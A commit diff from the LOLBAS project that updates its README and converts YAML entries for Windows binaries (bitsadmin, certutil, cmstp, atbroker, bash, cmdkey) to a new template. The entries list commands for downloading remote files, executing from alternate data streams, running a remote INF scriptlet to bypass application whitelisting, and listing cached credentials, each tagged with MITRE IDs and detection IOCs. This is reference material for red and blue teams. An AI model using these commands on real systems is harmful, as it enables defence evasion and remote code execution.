Update readme, began updating OSBins with new template

README.md

@@ -17,9 +17,10 @@ Primarily files that offer "extra" functionality.
 
 ## Definition
 
-* Must be a Microsoft signed file. (OS or downloaded from Microsoft site)
+* Must be a Microsoft signed file. (Native to the OS or downloaded from Microsoft site)
 * Only extra "unexpected" functionality is interesting (Not interesting to document what it was intended for)
   * Exceptions are Application Whitelisting bypasses
+* Primary focus is stuff that can be leveraged by APT or in Red Teaming
 
 * Functionality can include:
    * Executing code
@@ -48,14 +49,15 @@ We generate the MD files from this and later it will also be the base for an upc
 
 
 ## STORY
-"Living off the land" was coined by Matt Graeber - @mattifestation <3    
+"Living off the land" was coined by Christopher Campbell (@obscuresec) & Matt Graeber (@mattifestation)    
-One of the first "Living Off The Land" talks (That I know of) is this one:
+One of the first "Living Off The Land" talks is this one:
 https://www.youtube.com/watch?v=j-r6UonEkUw   
 
-The term LOLBins came from a twitter discussion on what to call these binaries. It was first proposed by Philip Goh - @MathCasualty here:
+The term LOLBins came from a twitter discussion on what to call these binaries that can be used by an attacker to perform other actions than what the binary was designed to do. 
+LOLBins was first proposed by Philip Goh (@MathCasualty) here:
 https://twitter.com/MathCasualty/status/969174982579273728
 
-The term LOLScripts came from Jimmy - @bohops: 
+The term LOLScripts came from Jimmy (@bohops): 
 https://twitter.com/bohops/status/984828803120881665
 
 Common hashtags for these files are:
@@ -71,7 +73,7 @@ A "highly scientific poll" was also conducted to agree (69% yes) on the name LOL
 https://twitter.com/Oddvarmoe/status/985432848961343488 
 
 The domain http://lolbins.com has been registered by an unknown individual and redirected it to this project. (Thank you)
-
+The domain http://lolbas-project.com has been registered by Jimmy (@bohops). (Thanks!)
 The awesome logos in the logo folder was provided by Adam Nadrowski (@_sup_mane) - Thank you so much man! 
 
 Love this logo:   
@@ -82,33 +84,36 @@ Love this logo:
 All features are added to the issues in this repo. 
 
 ### 1.0
-* Hosted https://github.com/api0cradle/LOLBAS/
+- [x] Hosted https://github.com/api0cradle/LOLBAS/
-* Only MD files
+- [x] Only MD files
     
        
 ### 2.0 -- Current
-* Hosted here on this repo
+- [x] Moved from api0cradle and hosted here on this repo (https://github.com/LOLBAS-Project/LOLBAS)
-* Everything converted to YML files   
+- [x] Everything converted to YML files   
-* MD files generated from YML files
+- [x] MD files generated from YML files
-* Clearer definition     
+- [x] Clearer definition of a LOLBin    
-* Management scripts
+- [ ] Management scripts
+- [x] New template
    
     	
 ### 2.1
-* More categories
+- [ ] Migration to new template
-* Jekyll frontend
+- [ ] More categories - Part of the new template
-* Privileges required
+- [ ] ATT&CK Mitre mapping
+- [ ] Privileges required by binary
+- [ ] Jekyll frontend
+
    
    
 ### 2.2
-* ATT&CK Mitre mapping
+- [ ] LOLBIN GUID - Unique ID for each bin
-* LOLBIN GUID - Unique ID for each bin
+- [ ]Sub-Categories
-* Sub-Categories
+  - [ ] Signed executing unsigned
-  * Signed executing unsigned
+  - [ ] Signed executing signed 
-  * Signed executing signed 
+  - [ ] Split commands into command, argument structure, and example. i.e. Command: cmstp.exe; ArgStructure: /ini /s <inf_file>; Example: cmstp.exe /ini /s c:\cmstp\CorpVPN.inf
-* Split commands into command, argument structure, and example. i.e. Command: cmstp.exe; ArgStructure: /ini /s <inf_file>; Example: cmstp.exe /ini /s c:\cmstp\CorpVPN.inf
 
   
 ### 2.3
-* Tests for PRs to ensure fields are valid
+- [ ] Tests for PRs to ensure fields are valid
-* Provide the project in DB format (sqlite)
+- [ ]Provide the project in DB format (sqlite)

yml/OSBinaries/Atbroker.yml

@@ -1,20 +1,29 @@
 ---
 Name: Atbroker.exe
-Description: Execute
+Description: Helper binary for Assistive Technology (AT)
-Author: ''
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: ATBroker.exe /start malware
     Description: Start a registered Assistive Technology (AT).
+    Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry.
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows 8, Windows 8.1, Windows 10
 Full Path:
-  - C:\Windows\System32\Atbroker.exe
+  - path: C:\Windows\System32\Atbroker.exe
-  - C:\Windows\SysWOW64\Atbroker.exe
+  - path: C:\Windows\SysWOW64\Atbroker.exe
-Code Sample: []
+Code Sample: 
-Detection: []
+- Code:
+Detection:
+ - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
+ - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
+ - IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware
 Resources:
-  - http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
+  - Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
-Notes: >
+Acknowledgement:
-  Thanks to Adam - @hexacorn
+  - Person: Adam
-  Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry.
+    Handle: '@hexacorn'
-
+---

yml/OSBinaries/Bash.yml

@@ -1,17 +1,35 @@
 ---
 Name: Bash.exe
-Description: Execute
+Description: File used by Windows subsystem for Linux
-Author: ''
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: bash.exe -c calc.exe
-    Description: Execute calc.exe.
+    Description: Executes calc.exe from bash.exe
+    Usecase: Performs execution of specified file, can be used as a defensive evasion.
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows 10
+    - Command: bash.exe -c calc.exe
+    Description: Executes calc.exe from bash.exe
+    Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
+    Category: AWL Bypass
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows 10
 Full Path:
-  - '?'
+  - path: C:\Windows\System32\bash.exe
-Code Sample: []
+  - path: C:\Windows\SysWOW64\bash.exe
-Detection: []
+Code Sample: 
+- Code:
+Detection:
+ - IOC: Child process from bash.exe
 Resources:
-  - ''
+  - Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
-Notes: Thanks to ?
+Acknowledgement:
-
+  - Person: Alex Ionescu
+    Handle: '@aionescu'
+---

yml/OSBinaries/Bitsadmin.yml

@@ -1,36 +1,59 @@
 ---
-Name: Bitsadmin.exe
+Name: bitsadmin.exe
-Description: Execute, Download, Copy, Read ADS
+Description: Used for managing background intelligent transfer
-Author: ''
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
-  - Command: |
+  - Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
-          bitsadmin /create 1
+    Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.
-          bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe
+    Usecase: Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique.
-          bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL
+    Category: Alternate data streams
-          bitsadmin /RESUME 1
+    Privileges: User
-          bitsadmin /complete 1
+    MitreID: T1096
-  - Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
-  - Command: |
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-          bitsadmin /create 1
+    - Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
-          bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
-          bitsadmin /RESUME 1
-          bitsadmin /complete 1
     Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
-  - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
+    Usecase: Download file from Internet
-    Description: One-liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
+    Category: Download
-  - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
+    Privileges: User
-    Description: One-Liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
+    MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+    - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
+    Description: Command for copying cmd.exe to another folder
+    Usecase: Copy file
+    Category: Copy
+    Privileges: User
+    MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+    - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
+    Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
+    Usecase: Execute binary file specified. Can be used as a defensive evasion.
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full Path:
-  - c:\Windows\System32\bitsadmin.exe
+  - path: C:\Windows\System32\bitsadmin.exe
-  - c:\Windows\SysWOW64\bitsadmin.exe
+  - path: C:\Windows\SysWOW64\bitsadmin.exe
-Code Sample: []
+Code Sample: 
-Detection: []
+- Code:
+Detection:
+ - IOC: Child process from bitsadmin.exe
+ - IOC: bitsadmin creates new files
+ - IOC: bitsadmin adds data to alternate data stream
 Resources:
-  - https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679
+  - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53
-    - Slide 53
+  - Link: https://www.youtube.com/watch?v=_8xJaaQlpBo
-  - https://www.youtube.com/watch?v=_8xJaaQlpBo
+  - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
-  - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+Acknowledgement:
-Notes: Thanks to Rob Fuller - @mubix , Chris Gates - @carnal0wnage, Oddvar Moe - @oddvarmoe
+  - Person: Rob Fuller
-
+    Handle: '@mubix'
+  - Person: Chris Gates
+    Handle: '@carnal0wnage'
+  - Person: Oddvar Moe
+    Handle: '@oddvarmoe'
+---

yml/OSBinaries/Certutil.yml

@@ -1,25 +1,56 @@
 ---
 Name: Certutil.exe
-Description: Download, Add ADS, Decode, Encode
+Description: Windows binary used for handeling certificates
-Author: ''
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
     Description: Download and save 7zip to disk in the current folder.
-  - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
+    Usecase: Download file from Internet
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+    - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
     Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
-  - Command: |
+    Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
-          certutil -encode inputFileName encodedOutputFileName
+    Category: Alternate data streams
-          certutil -decode encodedInputFileName decodedOutputFileName
+    Privileges: User
-    Description: Commands to encode and decode a file using Base64.
+    MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+    - Command: certutil -encode inputFileName encodedOutputFileName
+    Description: Command to encode a file using Base64
+    Usecase: Encode files to evade defensive measures
+    Category: Encode
+    Privileges: User
+    MitreID: T1027
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1027
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+    - Command: certutil -decode encodedInputFileName decodedOutputFileName
+    Description: Command to decode a Base64 encoded file.
+    Usecase: Decode files to evade defensive measures
+    Category: Decode
+    Privileges: User
+    MitreID: T1140
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1140
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full Path:
-  - c:\windows\system32\certutil.exe
+  - path: C:\Windows\System32\certutil.exe
-  - c:\windows\sysWOW64\certutil.exe
+  - path: C:\Windows\SysWOW64\certutil.exe
-Code Sample: []
+Code Sample: 
-Detection: []
+- Code:
+Detection:
+ - IOC: Certutil.exe creating new files on disk
+ - IOC: Useragent Microsoft-CryptoAPI/10.0
+ - IOC: Useragent CertUtil URL Agent
 Resources:
-  - https://twitter.com/Moriarty_Meng/status/984380793383370752
+  - Link: https://twitter.com/Moriarty_Meng/status/984380793383370752
-  - https://twitter.com/mattifestation/status/620107926288515072
+  - Link: https://twitter.com/mattifestation/status/620107926288515072
-Notes: Thanks to Matt Graeber - @mattifestation, Moriarty - @Moriarty2016
+Acknowledgement:
-
+  - Person: Matt Graeber
+    Handle: '@mattifestation'
+  - Person: Moriarty
+    Handle: '@moriarty2016'
+---

yml/OSBinaries/Cmdkey.yml

@@ -1,18 +1,28 @@
 ---
 Name: Cmdkey.exe 
-Description: Credentials
+Description: creates, lists, and deletes stored user names and passwords or credentials.
-Author: ''
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: cmdkey /list
-    Description: List cached credentials.
+    Description: List cached credentials
+    Usecase: Get credential information from host
+    Category: Credentials
+    Privileges: User
+    MitreID: T1078
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1078
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full Path:
-  - c:\windows\system32\cmdkey.exe
+  - path: C:\Windows\System32\cmdkey.exe
-  - c:\windows\sysWOW64\cmdkey.exe
+  - path: C:\Windows\SysWOW64\cmdkey.exe
-Code Sample: []
+Code Sample: 
-Detection: []
+- Code:
+Detection:
+ - IOC: Usage of this command could be and IOC
 Resources:
-  - https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
+  - Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
-Notes: ''
+  - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
-
+Acknowledgement:
+  - Person: 
+    Handle:
+---

yml/OSBinaries/Cmstp.yml

@@ -1,26 +1,43 @@
 ---
 Name: Cmstp.exe
-Description: Execute, UACBypass
+Description: Installs or removes a Connection Manager service profile.
-Author: ''
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
     Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
+    Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet. 
+    Category: Execute
+    Privileges: User
+    MitreID: T1191
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1191
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
     Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
+    Usecase: Execute code hidden within an inf file. Execute code directly from Internet. 
+    Category: AwL bypass
+    Privileges: User
+    MitreID: T1191
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1191
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full Path:
-  - C:\Windows\system32\cmstp.exe
+  - path: C:\Windows\System32\cmstp.exe
-  - C:\Windows\sysWOW64\cmstp.exe
+  - path: C:\Windows\SysWOW64\cmstp.exe
-Code Sample: []
+Code Sample: 
-Detection: []
+- Code:
+Detection:
+ - IOC: Execution of cmstp.exe should not be normal unless VPN is in use
+ - IOC: Cmstp.exe communication towards internet and getting files
 Resources:
-  - https://twitter.com/NickTyrer/status/958450014111633408
+  - Link: https://twitter.com/NickTyrer/status/958450014111633408
-  - https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
+  - Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
-  - https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e
+  - Link: https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e
-  - https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
+  - Link: https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
-  - https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1
+  - Link: https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1
-    (UAC Bypass)
+  - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp
-  - https://github.com/hfiref0x/UACME
+Acknowledgement:
-Notes: Thanks to Oddvar Moe - @oddvarmoe, Nick Tyrer - @NickTyrer
+  - Person: Oddvar Moe
-
+    Handle: '@oddvarmoe'
+  - Person: Nick Tyrer
+    Handle: '@NickTyrer'
+---